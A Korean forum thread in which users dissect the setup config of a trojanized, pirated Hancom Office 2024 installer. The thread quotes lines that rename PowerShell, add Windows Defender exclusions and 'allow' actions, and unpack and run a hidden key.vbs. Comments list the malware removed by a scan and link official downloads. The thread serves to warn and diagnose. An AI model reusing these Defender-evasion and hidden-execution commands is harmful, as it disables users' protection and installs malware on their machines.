소프트웨어 요즘 나도는 한컴2024 설정파일
2024.01.07 14:50
ExtRun0=Install\Install_UI\lo\HOffice130.exe
ExtRun1=Install\Install_UI\Logo_Copy.bat
ExtRun2=Install\Install_UI\lo\HOffice130.exe
ExtRun3=Install\Install_UI\lo\HOffice130.exe
ExtRun4=Install\HOffice2024Update_20231109.exe
ExtRun5=Install\Install_UI\lo\HOffice130.exe
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
여기에서
ExtRun1=Install\Install_UI\Logo_Copy.bat
ExtRun2=Install\Install_UI\lo\HOffice130.exe
ExtRun3=Install\Install_UI\lo\HOffice130.exe
ExtRun4=Install\HOffice2024Update_20231109.exe
ExtRun5=Install\Install_UI\lo\HOffice130.exe
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
이부분은 전부 없어도 되지 않을까요?
특히
ExtRunParam0=execmd copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Install\Install_UI\lo\vcredist.exe
ExtRunParam2=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'vcredist.exe';Add-MpPreference -ThreatIDDefaultAction_Actions @(6,6,6) -ThreatIDDefaultAction_Ids @(2147814524,2147731250,2147735503)
ExtRunParam3=exec hide Install\Install_UI\lo\vcredist.exe Add-MpPreference -ExclusionProcess 'key.vbs';Install\Install_UI\lo\7z.exe x -oInstall\Install_UI\lo\ Install\Install_UI\lo\keygen -px -y;Install\Install_UI\lo\key.vbs
ExtRunParam4=/silent
ExtRunParam5=filldelete Install\Install_UI\lo\key.vbs
는 상당히 찝찝해 보입니다. keygen key.vbs filldelete Install\Install_UI\lo\key.vbs ThreatIDDefaultAction 등등...
ExtRun0=Install\Install_UI\lo\HOffice130.exe 만 남기고
LevelOption=3 으로 전부 선택해서 설치해보면
한글만 설치되더군요. 한셀 한쇼 등등은 설치가 안됩니다.
그리고 설치가 끝나면
희안하게
nircmd..com 메시지가 나타나는군요. 한글설치하면서 이제껏 처음보는 메시지입니다.
먼가 파일변조가 있었을 확률이 높아보이네요
클린설치할 수 있는 설치본 원본만 어디서 못 구할까요
유포되고 있는 h2024.zip 파일은 상당히 찝찝하네요
댓글 [6]
-
젠투 2024.01.07 15:02 -
늑대아니에요! 2024.01.07 15:11
ExtRun0=Install\Install_UI\lo\HOffice130.exe
이부분도 삭제하니까
nircmd메시지는 나타나지 않는군요.
악성파일을 심은후 [PostInstall] 에서 먼가 장난질이 있는거 같습니다.
-
늑대아니에요! 2024.01.07 16:47
mzk 검색하니
■ 악성 및 유해 가능 파일 제거 :
"C:\Windows\System32\Tasks\Microsoft\Windows\Google\GoogleUpdateTask" (격리/제거 성공 [Active Scan])
"C:\Windows\svchost.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\KB5019959.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\KB5026372.exe" (격리/제거 성공 [Active Scan])
"C:\ProgramData\Google\GoogleUpdate.exe" (격리/제거 성공)
"C:\Users\Administrator\AppData\Roaming\Google\Libs\WR64.sys" (격리/제거 성공)
■ 악성 및 유해 가능 폴더 제거 :
"C:\Users\Administrator\AppData\Roaming\Google\Libs" (격리/제거 성공)
■ 악성 및 유해 가능 <HKEY_LOCAL_MACHINE> 레지스트리 제거 :
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe : Debugger" (격리/제거 성공)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe : Debugger" (격리/제거 성공)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Google\GoogleUpdateTask" (격리/제거 성공 [Active Scan])
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{495CD511-03B9-4F0A-8CC6-F2C248561AE9}" (격리/제거 성공 [Active Scan])
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{495CD511-03B9-4F0A-8CC6-F2C248561AE9}" (격리/제거 성공 [Active Scan])
흠...
-
위라이즈 2024.01.07 17:31
nircmd.exe 자체는 악성 프로그램은 아닙니다.
단지 CLI 툴로 이것저것 유용한 기능이 있지만, 악의적으로 사용한다면 사용자 모르게 무언가를 실행할 수도 있겠네요.
역시 중간에 7z.exe 도 보이는데, 어디 파일에서 압축을 풀고 vbs 파일 등으로 사용자 모르게 무언가를 할 수도 있겠네요.
게임 인스톨러 등에서는 압축 풀기 위해서 7z.exe를 사용하는 경우도 있긴 하나, 한컴에서는 굳이 중간에 nircmd.exe를 호출하거나 7z.exe을 이용해서 압축을 풀거나 vbs 파일 등을 이용해서 설치할 껀덕지가 있을 것 같진 않은데, 찜찜하면 안 쓰는게 맞습니다.
-
DarknessAngel 2024.01.07 18:13
원본은 시리얼만 있으면 얼마든지 구할 수 있습니다
-
늑대아니에요! 2024.01.07 18:20
https://windowsforum.kr/index.php?mid=data&page=5&document_srl=20291758
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_Hwp.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_Home.exe
http://cdn.hancom.co.kr/pds/hnc/DOWN/2024/HOfficeDN_2024_ESD.exe
idm 으로 다운받은 후 실행해보니 한컴 원본 설치파일이 생기네요.
감사합니다.
토렌트에 도는거 저 부분에 악성코드 삽입내용이라고 밝혀진지 오래됐습니다.
되도록이면 정품 사용하시길.
https://windowsforum.kr/free/20235156
정품키 구매하셨으면 바로 홈페이지에서 다운로드 가능하십니다.